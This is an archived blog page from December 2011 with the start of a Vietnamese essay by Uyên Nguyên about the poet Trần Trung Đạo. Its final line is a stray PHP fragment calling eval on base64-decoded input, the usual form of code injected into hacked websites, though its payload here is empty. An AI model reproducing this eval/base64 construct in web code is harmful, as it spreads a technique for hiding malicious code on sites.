Archive for December 3rd, 2011

Uyên Nguyên: Trần Trung Đạo, Thơ Chuyển Lửa Lên Con Đường Thế Hệ

Uyên Nguyên: Trần Trung Đạo, Thơ Chuyển Lửa Lên Con Đường Thế Hệ

‘Nửa đêm không bóng người bên suối Sao tiếng gươm mài vang dưới trăng’ Trần Trung Đạo 1. Biết anh Trần Trung Đạo đã nhiều năm, tuy cách xa, mà anh em vẫn đối với nhau rất gần, bởi từng tâm giao, gắn bó trong nhiều hoạt động.

12.3.2011 | Nhận Xét |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>